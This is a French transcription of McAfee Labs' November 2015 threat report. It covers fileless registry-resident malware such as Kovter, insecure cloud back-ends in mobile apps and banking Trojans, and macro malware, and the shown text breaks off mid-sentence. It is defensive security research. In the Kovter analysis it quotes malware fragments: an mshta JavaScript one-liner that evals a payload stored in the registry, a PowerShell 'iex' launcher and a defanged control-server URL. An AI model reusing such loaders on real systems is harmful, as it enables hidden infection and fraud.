Rapport de McAfee Labs sur le paysage des menaces Novembre
Transcription
Rapport de McAfee Labs sur le paysage des menaces Novembre
Rapport Rapport de McAfee Labs sur le paysage des menaces Novembre 2015 McAfee Labs recense 327 nouvelles menaces par minute, soit plus de 5 par seconde. À propos de McAfee Labs Introduction McAfee Labs est l'une des équipes les plus éminentes au monde en matière de recherche et de cyberveille sur les menaces. Ses orientations stratégiques dans le domaine de la cybersécurité font autorité. Grâce à des données sur les principaux vecteurs de menaces (fichiers, Web, messagerie et réseau) recueillies à partir de millions de sondes, McAfee Labs fournit une cyberveille en temps réel sur les menaces, des analyses critiques et des avis d'experts qui contribuent à améliorer les protections informatiques tout en réduisant les risques. Cet automne, McAfee Labs n'a pas chômé. McAfee fait désormais partie d'Intel Security. www.mcafee.com/fr/mcafee-labs.aspx En octobre, nous avons publié le rapport Les données au cœur d'une économie souterraine, qui s'intéresse au sort des données volées après leur compromission et aux multiples possibilités de profit qu'offrent ces informations. Il illustre également par de nombreux exemples à quoi ressemblent ces marchés noirs pour données volées et explique la valeur associée à certains types d'informations. En novembre, nous avons publié le rapport McAfee Labs Prévisions 2016 en matière de menaces. Cette édition aborde l'avenir de la cybersécurité selon deux perspectives différentes. ■■ Suivre McAfee Labs ■■ Nous avons commencé par interroger 21 experts d'Intel Security, qui nous ont livré leur point de vue sur l'avenir du paysage des cybermenaces et sur les mesures que prendra vraisemblablement le secteur de la sécurité informatique pour y faire face au cours des cinq prochaines années. Nous les avons invités à se projeter en avant pour prédire l'évolution des cyberpirates, de leurs comportements et de leurs cibles, et la riposte probable de notre secteur à l'horizon 2020. Dans la seconde partie, nous avons poussé plus loin notre analyse et formulé des prévisions plus précises sur l'activité attendue en 2016 concernant un large éventail de menaces. Celles-ci vont des logiciels de demande de rançon (ransomware) aux attaques ciblant les automobiles ou les infrastructures critiques, jusqu'à l'entreposage et la vente de données volées. Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 2 À peu près au même moment, nous avons participé à la rédaction d'un rapport de la Cyber Threat Alliance, un groupe réunissant plusieurs éditeurs de solutions de sécurité de premier plan dont l'objectif est de partager la cyberveille sur les menaces au profit de tous leurs clients. Ce rapport intitulé Lucrative Ransomware Attacks: Analysis of the CryptoWall Version 3 Threat (Des attaques de ransomware très lucratives : analyse de la menace CryptoWall version 3) est le fruit de plusieurs mois d'analyses techniques menées conjointement par Intel Security, Symantec, Palo Alto Networks et Fortinet. Il décortique la famille CryptoWall version 3 qui a rapporté plus de 325 millions de dollars en rançons à ses auteurs. Les menaces, les tactiques et les indicateurs de compromission étudiés dans ce rapport ont été partagés par tous les membres de l'alliance et avec la communauté open source. C'est sans doute une première dans le secteur de la sécurité informatique. Pour couronner le tout, nous avons également organisé cinq ateliers pratiques, deux présentations techniques poussées et trois séances de discussion lors de la Conférence sur la sécurité FOCUS 15 d'Intel Security. Les présentations de McAfee Labs se sont intéressées à un large éventail de sujets, depuis les dernières tendances en matière d'attaques ciblées jusqu'aux opérations de démantèlement menées par les forces de l'ordre de plusieurs pays avec le concours de McAfee Labs. Pour clôturer l'année en beauté, nous publions à présent le Rapport de McAfee sur le paysage des menaces — Novembre 2015. L'édition de ce trimestre propose trois articles : ■■ ■■ ■■ Le premier s'intéresse à l'émergence d'une nouvelle génération de logiciels malveillants sans fichier, qui échappent à la détection en se dissimulant dans le Registre Windows et en effaçant toute trace d'infection du système de fichiers. Nous nous penchons ensuite sur les mauvaises pratiques de codage en matière de sécurité des applications mobiles dans le cloud, et le non-respect des consignes des fournisseurs de services de back-end : deux carences qui peuvent entraîner une exposition des données utilisateur dans le cloud. Le troisième article traite du retour des logiciels malveillants diffusés par macro, principalement sous la forme de campagnes de spam sophistiquées et de macros intelligentes qui restent cachées même après avoir téléchargé leur charge active. À noter aussi… En plus de mener de nombreuses études sur les menaces, McAfee Labs met au point des technologies fondamentales qui seront intégrées aux produits Intel Security. Nous sommes très heureux de vous annoncer qu'au cours de récents tests indépendants, les produits de sécurité pour terminaux de notre entreprise ont réalisé leurs meilleures performances à ce jour. Les scores de protection obtenus étaient parfaits. Ces excellents résultats sont à mettre au compte des améliorations constamment apportées à McAfee GTI (dont la cyberveille alimente les produits de sécurité pour terminaux d'entreprise) et de l'optimisation des performances des fichiers DAT. Bravo à l'équipe de développement de McAfee Labs ! Chaque jour, nous en apprenons un peu plus sur les données et le trafic générés par McAfee Global Threat Intelligence. Le tableau de bord dans le cloud de McAfee GTI nous permet de détecter et d'analyser des modèles d'attaques réelles, de façon à ce que nos clients bénéficient d'une protection plus efficace. Ces informations offrent un tableau très complet des volumes d'attaques subies par nos clients. Voici un bref aperçu de la situation au 3e trimestre : ■■ ■■ ■■ ■■ ■■ Plus de 44,5 milliards de requêtes par jour reçues en moyenne par McAfee GTI Plus de 7,4 millions de tentatives par heure (via e-mails, recherches Internet, etc.) incitant les clients à se connecter à des URL dangereuses Plus de 3,5 millions de fichiers infectés par heure identifiés dans les réseaux des clients 7,4 millions de tentatives d'installation ou de démarrage de programmes potentiellement indésirables par heure 2,2 millions de tentatives de connexions réseau depuis ou vers des adresses IP dangereuses par heure Les commentaires que nous recevons de nos lecteurs à propos de nos Rapports sur le paysage des menaces nous sont toujours très utiles. Si vous souhaitez nous faire part de vos impressions au sujet de cette édition, cliquez ici pour participer à une petite enquête qui ne vous prendra pas plus de cinq minutes. — Vincent Weafer, Vice-Président Directeur, McAfee Labs Comme d'habitude, la deuxième partie du rapport présente nos statistiques trimestrielles sur les menaces. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 3 Sommaire Rapport de McAfee Labs sur le paysage des menaces Novembre 2015 Ce rapport a été préparé et rédigé par : Carlos Castillo Diwakar Dinkar Paula Greve Suriya Natarajan François Paget Eric Peterson Arun Pradeep Avelino Rico Craig Schmugar Rakesh Sharma Rick Simon Dan Sommer Bing Sun Chong Xu Résumé 5 Points marquants 7 La furtivité croissante des logiciels malveillants sans fichier Les chevaux de Troie bancaires sur mobiles livrent leurs secrets dans le cloud 8 16 Le retour des logiciels malveillants diffusés par macro 34 Statistiques sur les menaces 48 Résumé La furtivité croissante des logiciels malveillants sans fichier Les logiciels malveillants sans fichier échappent à la détection en limitant ou en éliminant l'enregistrement de fichiers binaires sur disque. Les plus récents d'entre eux ne laissent aucune trace sur le disque, ce qui complique considérablement leur détection. Ces dernières années, les auteurs de logiciels malveillants ont mis au point de nouvelles méthodes pour échapper à la détection en se cachant dans la pile système. Les systèmes de détection en place sont mis à mal par des techniques qui renforcent l'efficacité des attaques, telles que le polymorphisme, les fonctions de surveillance, la révocation des autorisations, etc. Plus récemment, les cybercriminels ont conçu des logiciels malveillants qui utilisent des fonctions comme l'infrastructure de gestion Windows (WMI, Windows Management Instrumentation) et Windows PowerShell pour lancer des attaques sans enregistrer de fichier sur disque. Bien qu'aucun fichier ne signale leur présence, les infections résidentes en mémoire sont depuis longtemps connues des experts en sécurité informatique. Par le passé, les infections déposaient toujours un petit fichier binaire à un emplacement du disque, mais les dernières techniques de contournement utilisées par les logiciels malveillants sans fichier (p. ex. Kovter, Powelike et XswKit) ne laissent aucune trace sur le disque. Cette nouvelle méthodologie complique singulièrement la détection dans la mesure où celle-ci se base généralement sur la présence de fichiers statiques sur disque. Les chevaux de Troie bancaires sur mobiles livrent leurs secrets dans le cloud Certains développeurs d'applications mobiles ne respectent malheureusement pas les consignes de leurs fournisseurs de services de back-end, exposant ainsi les informations des clients à des attaques. Les applications mobiles, tant légitimes que malveillantes, reposent souvent sur des services de back-end mal sécurisés. Les développeurs d'applications mobiles concentrent la majeure partie de leurs ressources de développement sur l'interaction de l'application avec l'utilisateur. Ils dépendent par contre des fournisseurs de services de back-end pour gérer les informations stockées dans le cloud. Or, si la plupart d'entre eux offrent des fonctionnalités de sécurité pour protéger les données hébergées dans leur infrastructure, McAfee Labs, en collaboration avec des chercheurs indépendants, a découvert qu'en général, l'implémentation et la configuration par défaut de ces services ne sont pas suffisamment sécurisées — ce qui ouvre la porte aux accès non autorisés aux données stockées dans le cloud. Siegfried Rasthofer de la Technische Universität Darmstadt et Eric Bodden de l'Institut Fraunhofer SIT ont, avec l'assistance de McAfee Labs, mené une enquête sur trois importants fournisseurs de services de back-end. Au terme de l'analyse d'environ deux millions d'applications, ils ont identifié 56 millions d'enregistrements de données non protégés. Les chercheurs ont découvert des informations sensibles, dont des noms complets, des adresses e-mail, des mots de passe, des photos, des transactions financières et même des dossiers médicaux, susceptibles d'être exploités à des fins d'usurpation d'identité, d'envoi de spam, de distribution de logiciels malveillants et plus encore. Cela étant, comme les attaquants ne respectent pas non plus les meilleures pratiques de sécurité en matière de codage, nous avons tourné la situation à notre avantage. Nous avons analysé 294 817 applications mobiles truffées de logiciels malveillants et nous en avons identifié 16 dont la sécurité du backend laissait à désirer. Ensuite, nous nous sommes concentrés sur deux chevaux de Troie bancaires sur mobiles, Android/OpFake et Android/Marry, afin de décortiquer leur comportement en matière de vol de données et d'argent. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 5 Le retour des logiciels malveillants diffusés par macro Les logiciels malveillants diffusés par macro font leur retour après une longue éclipse. Les campagnes les plus réussies distribuent ces nouvelles macros intelligentes via des documents joints à des e-mails de spam sophistiqués. Ces macros restent cachées même après avoir téléchargé leur charge active. Dans les années 90, les logiciels malveillants diffusés par macro tels que Melissa et WM.Concept ont fait des ravages jusqu'à ce que les développeurs de logiciels, essentiellement Microsoft, prennent des mesures pour réduire leur efficacité. Après une éclipse de plusieurs années, les macros malveillantes refont leur apparition. La plupart des particuliers sont à l'abri de telles menaces dans la mesure où ils utilisent peu les macros. En revanche, les grandes entreprises y ont souvent recours pour créer facilement des programmes destinés à traiter des tâches répétitives. Actuellement, les développeurs de logiciels malveillants diffusés par macro utilisent des techniques d'ingénierie sociale courantes pour s'attaquer aux entreprises, avec le concours involontaire de leurs utilisateurs. Cette nouvelle génération de malware s'introduit généralement dans les réseaux d'entreprise à la suite de campagnes de spam sophistiquées qui tirent parti des informations collectées grâce à l'ingénierie sociale pour se donner l'apparence de la légitimité. Ces nouvelles macros intelligentes restent cachées même après avoir téléchargé leur charge active. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 6 Points marquants La furtivité croissante des logiciels malveillants sans fichier Les chevaux de Troie bancaires sur mobiles livrent leurs secrets dans le cloud Le retour des logiciels malveillants diffusés par macro Donner votre avis Points marquants La furtivité croissante des logiciels malveillants sans fichier — Arun Pradeep et Suriya Natarajan Les techniques d'infiltration et de persistance utilisées par les logiciels malveillants ne cessent d'évoluer. Ces dernières années, les auteurs de logiciels malveillants ont mis au point de nouvelles méthodes pour échapper à la détection en se cachant dans la pile système. Les systèmes de détection en place sont mis à mal par des techniques qui renforcent l'efficacité des attaques, telles que le polymorphisme, les fonctions de surveillance, la révocation des autorisations, etc. Plus récemment, les cybercriminels ont conçu des logiciels malveillants qui utilisent des fonctions comme l'infrastructure de gestion Windows (WMI, Windows Management Instrumentation) et Windows PowerShell pour lancer des attaques sans enregistrer de fichier sur disque. Les infections sans fichier résidentes en mémoire sont depuis longtemps connues des experts en sécurité informatique. Par le passé, même lorsqu'elles étaient qualifiées d'infections « sans fichier », les menaces déposaient toujours un petit fichier binaire quelque part sur le disque. Par contre, les dernières techniques de contournement utilisées par les logiciels malveillants sans fichier (p. ex. Kovter, Powelike et XswKit) ne laissent aucune trace sur le disque. Cette nouvelle méthodologie complique singulièrement la détection dans la mesure où celle-ci se base généralement sur la présence de fichiers statiques sur disque. Les logiciels malveillants sans fichier ont connu un réel essor à la fin de l'année 2014 et début 2015. Au cours des trois premiers trimestres de l'année, McAfee Labs a détecté 74 471 échantillons relevant de trois grandes familles de logiciels malveillants sans fichier. Les mesures de protection développées contre certaines de ces nouvelles familles ont contribué à réduire le nombre d'échantillons, mais ils perdurent. Tendance des logiciels malveillants sans fichier 20 000 18 000 16 000 14 000 12 000 10 000 8 000 6 000 4 000 2 000 0 Janv. Févr. Mars Avr. Mai Juin 2015 Juil. Août Sept. Oct. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 8 Points marquants Types de logiciels malveillants sans fichier Les logiciels malveillants qui infectent un système sans laisser de trace de leur exécution sur disque portent le nom de logiciels malveillants sans fichier. Ils sont généralement de trois types : ■■ ■■ ■■ Résident en mémoire : Ce type de logiciel malveillant sans fichier utilise l'espace mémoire d'un fichier Windows légitime. Il charge son code dans cet espace mémoire et y réside jusqu'à ce qu'il soit accédé ou activé. Bien que l'exécution intervienne au sein de l'espace mémoire du fichier légitime, il existe un fichier physique dormant qui initie ou redémarre l'exécution. Par conséquent, ce type de logiciel malveillant n'est pas complètement « sans fichier ». Rootkit : Certains logiciels malveillants sans fichier dissimulent leur présence derrière une API utilisateur ou noyau. Un fichier est présent sur le disque mais en mode furtif. Ici aussi, on ne peut pas vraiment parler de logiciel malveillant « sans fichier ». Registre Windows : Certains types de logiciels malveillants récents résident dans le Registre du système d'exploitation Microsoft Windows. Leurs auteurs ont exploité des fonctionnalités tel le cache de miniatures Microsoft, utilisé afin de stocker des images pour l'affichage Miniatures de l'Explorateur Windows. Le cache de miniatures offre au logiciel malveillant un mécanisme de persistance. Les logiciels malveillants sans fichier doivent toujours pénétrer dans le système de la victime via un fichier binaire statique. La plupart d'entre eux utilisent l'e-mail comme vecteur. Dès que l'utilisateur clique sur la pièce jointe, le logiciel malveillant écrit l'intégralité du fichier de la charge active sous une forme chiffrée dans une ruche du Registre Windows. Ensuite, il s'autodétruit pour disparaître du système. Très intelligemment conçues, les familles de logiciels malveillants sans fichier comme Kovter, Powelike et XswKit peuvent exécuter des attaques du Registre Windows sans le moindre fichier et sans laisser aucune trace dans le système de fichiers. Bien que leurs auteurs préparent l'environnement destiné à lancer ces attaques en exécutant du code dans un fichier, ce dernier s'autodétruit dès que le système est prêt pour l'attaque malveillante. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 9 Points marquants Organigramme d'une infection par logiciel malveillant sans fichier Campagne de spam Injecteur de virus Sites web malveillants crée Clé de Registre Run avec JavaScript Entrée de Registre du cache de miniatures exécute exécute Powershell exécute le script chiffré Charge active malveillante Exécution du code malveillant dans la mémoire de processus légitimes Source : McAfee Labs, 2015 Techniques utilisées pour dissimuler des infections sans fichier Kovter et Powelike écrivent le script JavaScript et la charge active chiffrée dans une ruche du Registre et révoquent l'autorisation utilisateur sur les clés associées, non seulement pour se cacher des produits de sécurité mais aussi pour empêcher tout accès utilisateur. Cette famille de malware utilise deux techniques pour rester invisible à l'utilisateur : le masquage et l'utilisation d'un caractère nul. Masquage : Le malware sans fichier masque les entrées du Registre soit en révoquant la liste de contrôle d'accès (ACL), soit en ajoutant un caractère nul dans le nom de la valeur du Registre. Une ACL ou liste de contrôle d'accès est une liste de mesures de protection appliquées à un objet. Par objet, on entend un fichier, un processus, un événement ou tout autre élément associé à un descripteur de sécurité. Dans ce cas-ci, l'entrée du Registre est l'objet dont les autorisations ACL sont révoquées par le logiciel malveillant sans fichier, ce qui empêche l'utilisateur d'accéder à l'élément malveillant du Registre. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 10 Points marquants Utilisation d'un caractère nul dans le nom d'une valeur du Registre : Une autre technique simple mais efficace utilisée par les attaquants consiste à inclure un ou plusieurs caractères nuls dans le nom d'une valeur du Registre. L'éditeur du Registre Windows ne peut pas afficher des entrées, par exemple des clés, des données ou des valeurs, lorsqu'elles comportent un caractère nul. Le logiciel malveillant écrit le fichier chiffré complet dans une clé dont le nom commence par un caractère nul. En cas de tentative d'accès à la clé créée par le logiciel malveillant, le message d'erreur suivant s'affiche dans l'éditeur du Registre : Message d'erreur affiché lors de l'accès à une clé de Registre contenant un caractère nul Exécution des logiciels malveillants sans fichier Les auteurs de ces menaces ont soigneusement choisi les applications légitimes du système d'exploitation Windows censées exécuter leurs fichiers binaires. Deux applications Windows sont utilisées pour l'exécution des logiciels malveillants sans fichier, à savoir l'infrastructure de gestion Windows (WMI, Windows Management Instrumentation) et PowerShell : Infrastructure de gestion Windows (WMI) : WMI est l'implémentation Microsoft de WBEM (Web-Based Enterprise Management), une initiative visant à développer une technologie standard pour accéder aux informations de gestion dans un environnement d'entreprise. Cet utilitaire Microsoft peut être utilisé par un logiciel malveillant sans fichier pour exécuter des scripts JavaScript malveillants. PowerShell : Windows PowerShell est un cadre de gestion de la configuration et de l'automatisation des tâches développé par Microsoft. Il comprend un shell de ligne de commande et un langage de script associé basé sur .NET Framework. Une charge active malveillante chiffrée au format Base64 est écrite dans le Registre, puis exécutée à l'aide d'un script PowerShell. L'exemple suivant illustre une fonction de logiciel malveillant sans fichier déchiffrée et codée dans la clé de Registre qui appelle le fichier exécutable PowerShell pour exécuter le code de la charge active chiffrée. Ly9oS6=TN25.Run("C:\\Windows\\System32\\WindowsPowerShell\\ v1.0\\powershell.exe iex $env:csnvjgc",0,1) Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 11 Points marquants Analyse de Kovter par McAfee Labs Les familles de logiciels malveillants sans fichier les plus répandues utilisent diverses clés de Registre exécutées automatiquement pour infecter le système. Elles stockent leur charge active complète dans des clés personnalisées, généralement invisibles à l'utilisateur. La plupart des variantes de ce type de menaces ciblent les injections via les champs de recherche, les fraudes aux clics publicitaires et l'identification des informations système. L'injecteur principal de Kovter crée un environnement pour l'infection complète. Une clé de Registre Run contenant un script JavaScript est créée avec un nom de valeur incluant un caractère nul. Or, il est impossible pour l'utilisateur d'accéder à un nom de valeur comportant un caractère nul. Nom de valeur de Registre contenant un caractère nul La valeur de la clé de Registre Run pointe vers une autre clé de Registre contenant le script malveillant destiné à charger la fonction de surveillance et la charge active. L'exemple suivant illustre la valeur de la clé de Registre qui pointe vers une autre clé de Registre sous l'entrée HKCU\Software. mshta javascript:wnd1w7pRy="X";yg2=new%20 ActiveXObject("WScript.Shell");COlM2JWez="pKiLSI";Vr0AD6=yg2. RegRead("HKCU\\software\\3cf540da\\ e925fae2");YJa6FFTM="0nl0";eval(Vr0AD6);ASC7rr9Oj="hAzrr"; Dans l'illustration suivante, le script JavaScript dans la clé de Registre HKCU\ Software est chiffré et masqué. Charge active et code de surveillance chiffrés écrits dans le Registre Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 12 Points marquants Le code JavaScript suivant est le résultat de l'exposition du code de premier niveau, lequel contient le shellcode codé au format Base64. Shellcode chiffré en Base64 Le décodage du shellcode en Base64 permet de voir le script PowerShell chargé d'exécuter le code malveillant et le script de la fonction de surveillance. Script PowerShell en Base64 déchiffré Exécution du script PowerShell Le script PowerShell exécute le code malveillant dans la mémoire des systèmes de fichiers légitimes pour rester en mémoire sans être détecté. ■■ Regsvr32.exe ■■ Svchost.exe ■■ Dllhost.exe Dès que le code PowerShell est exécuté, le logiciel malveillant établit une connexion avec son serveur de contrôle. ■■ hxxp://185.5.250.230/upload.php Il collecte ensuite une pléthore d'informations sur la machine hôte et effectue une série d'actions. ■■ ■■ Il collecte différentes informations système, dont la version du système d'exploitation, le Service Pack et l'architecture (32 ou 64 bits). Il recherche .NET Framework, Adobe Flash Player et la dernière version du navigateur. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 13 Points marquants Informations collectées par Kovter à propos du système infecté Nom Valeur Description Mode 1 Action à exécuter sur l'hôte UID 5BD39AA1CAF61D76 ID utilisateur OS Win 7, SP1 IL:3 Version du système d'exploitation et Service Pack OS bits x32 Architecture du chipset V 2.0.3.5 Version du logiciel malveillant aff_id 610 ID du nœud affecté Oslang ENU Langue du système d'exploitation GMT GMT +05:30 Fuseau horaire Threads 0 Nombre de threads en cours d'exécution Online 355 Nombre d'infections actives Total RAM 2047 Capacité de la mémoire RAM Load RAM 0 RAM utilisée par le logiciel malveillant Free RAM 1404 RAM libre disponible CPU Load 7 Charge du processeur Antispyware Windows Defender Programme de sécurité installé Le code exécuté en mémoire analyse les ressources du système et reçoit des informations de son serveur de contrôle de façon dynamique, ce qui lui permet de manipuler l'attaque sans affecter l'utilisateur et sans être détecté. Plus l'ordinateur est puissant et possède de ressources, plus le trafic observé sur le réseau est important. Kovter met également en œuvre des techniques pour échapper aux tentatives de neutralisation des chercheurs en sécurité. Il détermine si l'hôte est une machine virtuelle ou s'il possède des solutions antimalware et des outils de surveillance. Parmi les informations collectées sur l'hôte, citons les suivantes : ■■ &antivirus=McAfee VirusScan Enterprise ■■ AntiWireShark ■■ &antidetect=AntiVMware Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 14 Points marquants Le logiciel malveillant sans fichier recherche la présence d'applications spécifiques. S'il ne les trouve pas, il les télécharge et les installe sur le système de la victime. Découvrez comment Intel Security peut vous aider à vous protéger contre cette menace. ■■ .NET Framework ■■ Adobe Flash Player ■■ Dernière version du navigateur Internet Explorer Ces applications sont nécessaires pour pouvoir accéder aux sites web contenant des publicités Flash et pour cliquer sur celles-ci à l'insu de l'utilisateur. Une fois son évaluation du système terminée, Kovter prépare un navigateur pour balayer toutes les pages d'un site web et cliquer sur toutes les publicités. Le serveur de contrôle transmet dynamiquement des sites hébergeant des publicités sur lesquelles le logiciel malveillant clique de façon aléatoire. À ce stade, le système infecté est devenu un véritable robot à clics frauduleux. Fraude aux clics Kovter contient des chaînes de recherche programmées en dur et utilisées pour remplir des pages web hébergeant des publicités connexes, sur lesquelles le logiciel malveillant clique aléatoirement à l'aide du code intégré. La fraude aux clics est très lucrative pour l'attaquant qui tire parti du modèle publicitaire basé sur le paiement au clic. Celui-ci permet à l'annonceur de rémunérer l'éditeur du site web à chaque clic de sa publicité. Plus le nombre de clics est élevé, plus les profits sont importants. Ces fraudeurs ne s'en tiennent pas là. Il semble qu'ils se soient également associés à des auteurs de logiciels de demande de rançon (ransomware). Certaines variantes de Kovter analysées par McAfee Labs ont téléchargé des charges actives supplémentaires appartenant à la famille CryptoWall. Nous n'avons constaté aucun vol d'informations par Kovter. Son seul but est apparemment d'infiltrer le système de la victime et de le transformer en robot à clics. Détection de la menace par les technologies de sécurité Dans le cas d'un logiciel malveillant sans fichier, une détection basée sur les fichiers, les dossiers ou d'autres éléments statiques du système cible n'est généralement pas possible car cette menace ne laisse aucune trace permanente. En outre, comme aucun processus indépendant n'est en cours d'exécution dans la mémoire, une détection basée sur les processus est tout aussi inefficace. Une détection reposant sur l'accès utilisateur au Registre n'est pas toujours possible non plus, puisque l'accès utilisateur est souvent révoqué par l'utilisation de caractères nuls dans les valeurs des clés de Registre. Qui plus est, le chiffrement des valeurs des clés de Registre est parfois dynamique. Dès lors, la détection statique d'une clé de Registre infectée échoue également. Puisqu'aucune application ou vulnérabilité spécifique n'est visée, les mises à jour Windows ou les correctifs d'application n'empêchent pas les utilisateurs d'être victimes de ce type d'attaque. Comme la source de l'infection est généralement l'e-mail ou un site web malveillant, une navigation sécurisée et le respect de bonnes pratiques en matière d'e-mails restent les deux meilleures défenses. Les technologies de protection de la messagerie électronique et de l'environnement web aideront les utilisateurs à se protéger du vecteur d'attaque initial de ce type de menace, qui inclut toujours un fichier joint. Certaines technologies de protection des terminaux sont suffisamment intelligentes pour détecter les logiciels malveillants sans fichier. Enfin, la technologie de détection basée sur les comportements devrait être encore plus efficace dans l'interception de telles menaces. Pour découvrir comment les produits de sécurité Intel Security détectent les logiciels malveillants sans fichier, cliquez ici. Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 15 Points marquants Les chevaux de Troie bancaires sur mobiles livrent leurs secrets dans le cloud — Carlos Castillo Pratiquement toutes les applications mobiles sont connectées à Internet, ce qui augmente la disponibilité des données sur les différents équipements et plates-formes. En cas de panne ou de remplacement de l'appareil mobile, il est généralement possible de restaurer les données des applications à partir du cloud. Toutefois, le stockage et la gestion à distance des données des applications mobiles peuvent coûter cher et prendre du temps. Au lieu de se concentrer exclusivement sur le développement de l'application elle-même, les développeurs consacrent du temps et de l'argent à concevoir et à tester la partie back-end de l'application dans le cloud, ce qui nécessite des connaissances spécifiques en matière de bases de données et de langages de programmation côté serveur. Données personnelles collectées par les applications mobiles et stockées dans le back-end Source : https://www.sit.fraunhofer.de/fileadmin/bilder/presse/appdatathreat_pressebild.jpg Pour pallier le problème, des sociétés Internet comme Amazon, Google et Facebook proposent des services de back-end entièrement gérés, faciles à implémenter et prêts à l'emploi : les services BaaS, ou Backend-as-a-Service. Ces services offrent un stockage et une gestion des données sécurisés pour les applications web et mobiles. La plupart des fournisseurs BaaS offrent des fonctionnalités de sécurité pour protéger les données hébergées dans leur infrastructure. McAfee Labs, en collaboration avec des chercheurs indépendants, a toutefois constaté qu'en général, l'implémentation et la configuration de ces services par les développeurs d'applications mobiles ne sont pas suffisamment sécurisées — ce qui ouvre la porte aux accès non autorisés aux données stockées dans le cloud. Partager ce rapport En mars dernier, Siegfried Rasthofer de la Technische Universität Darmstadt et Eric Bodden de l'Institut Fraunhofer SIT ont, avec l'assistance de McAfee Labs, mené une enquête sur deux millions d'applications mobiles connectées à trois importants fournisseurs de services BaaS (Facebook Parse, CloudMine et Amazon AWS). À cette occasion, ils ont identifié 56 millions d'enregistrements de données non protégées. Les chercheurs sont parvenus à accéder aux bases de données dans le cloud à partir de plusieurs applications légitimes et découvert des informations sensibles — dont des noms complets, des adresses e-mail, des mots de passe, des photos, des transactions financières et même des dossiers médicaux susceptibles d'être exploités à des fins d'usurpation d'identité, d'envoi de spam, de distribution de logiciels malveillants et plus encore. (Au lieu de divulguer publiquement le nom de ces développeurs d'applications, les chercheurs les ont avertis personnellement pour protéger les informations des clients.) Même si les fournisseurs de services BaaS proposent des instructions pour implémenter leurs services en toute sécurité, il apparaît clairement que certains développeurs ne les ont pas respectées. Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 16 Points marquants Par exemple, l'une des recommandations de sécurité les plus importantes pour un fournisseur de service BaaS consiste à manipuler les enregistrements (les lire, les mettre à jour ou les supprimer) via d'autres canaux, dont les interfaces web d'administration, et non l'application elle-même. Cette consigne a toute sa raison d'être dans la mesure où, par défaut, l'accès aux données est uniquement sécurisé par une clé « secrète » qui est incorporée dans l'application lorsqu'elle est distribuée à un utilisateur. Elle est donc accessible à quiconque possédant un minimum de connaissances techniques et capable de l'extraire en décompilant l'application ou en effectuant une recherche de chaîne. Les clés propres aux utilisateurs codées en dur dans les applications mobiles peuvent être interceptées, rendant ainsi risquée la manipulation des données de cloud directement par l'application. Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Utilisation mal sécurisée des services BaaS de Facebook Parse par les chevaux de Troie bancaires sur mobiles Si les applications légitimes ne respectent pas ces consignes de sécurité et exposent ainsi des millions d'enregistrements clients, qu'en est-il des applications mobiles malveillantes qui utilisent les fournisseurs BaaS pour assurer leurs services de back-end ? Est-il possible qu'eux non plus ne respectent pas les bonnes pratiques de sécurité requises et s'exposent ainsi au regard scrutateur des chercheurs en sécurité ? En juillet, en collaboration avec Siegfried Rasthofer et Eric Bodden, McAfee Labs a analysé 294 817 échantillons d'applications mobiles truffées de logiciels malveillants. Leur constat était que 16 d'entre elles se connectaient à des instances BaaS vulnérables, implémentées dans l'outil Facebook Parse. McAfee Labs a découvert que neuf applications pouvaient accéder à des tables de la base de données dans le cloud (NewTasks, SmsReceiver et TaskManager), ce qui a conduit les chercheurs à penser que le service BaaS était également Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 17 Points marquants utilisé comme serveur de contrôle. Ils ont identifié cinq comptes Facebook Parse compromis et utilisés par deux familles de chevaux de Troie mobiles apparentées : Android/OpFake et Android/Marry. SMiShing : Attaques de phishing par SMS. Pour comprendre comment ces menaces exploitent les services BaaS et quels types d'informations sont stockées dans le cloud, nous avons décompilé une variante de la famille de malware Android/OpFake, moins complexe, que nous avons ensuite soumise à une analyse statique. L'application malveillante, vraisemblablement distribuée via des attaques de SMiShing, se fait passer pour un programme d'installation (Установка) de l'application de messagerie instantanée russe légitime Чат для друзей. ДругВокруг (Chat for Friends) : Android/OpFake se faisant passer pour une application de messagerie instantanée russe Lorsque l'application malveillante est exécutée, un message fictif s'affiche à l'écran pour avertir l'utilisateur que l'application va être téléchargée et installée sur l'appareil : Faux message affiché par Android/OpFake Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 18 Points marquants Toutefois, au lieu de faire ce qu'annonce l'interface utilisateur, le malware dissimule l'icône dans l'écran d'accueil et démarre un service en arrière-plan qui abonne l'appareil aux notifications push de l'outil Facebook Parse, transmet des informations sur celui-ci au serveur de contrôle Facebook Parse ainsi qu'au serveur de contrôle traditionnel (non BaaS) et, enfin, planifie une alarme système : Le téléphone sonne Application exécutée Canaux : • D-<ID_terminal> • « Tout le monde » • Pays (ISO SIM) • « Bienvenue » Abonnement aux notifications Push Parse Enregistrement des informations d'installation Parse • IMEI • Pays de la carte SIM • Opérateur de la carte SIM • Numéro de téléphone • API • Marque • Modèle • is_worked (vrai) • worked_task (vrai) • is_root Démarrage terminé Démarrage du service principal Masquage de l'icône Enregistrement local de l'URL du serveur de contrôle principal Fin Exécution des tâches asynchrones Transfert des informations du terminal vers le serveur de contrôle /bn/reg.php Planification de l'alarme système • • • • IMEI Pays de la carte SIM Numéro de téléphone Opérateur de la carte SIM • Solde Exécution du récepteur de contenu toutes les minutes Comportement d'Android/OpFake lorsque l'application est exécutée ou que le service est démarré en tâche de fond Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf Partager ce rapport Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 19 Points marquants L'alarme système s'exécute toutes les minutes et vérifie s'il existe de nouvelles commandes à exécuter tant sur le serveur de contrôle habituel que 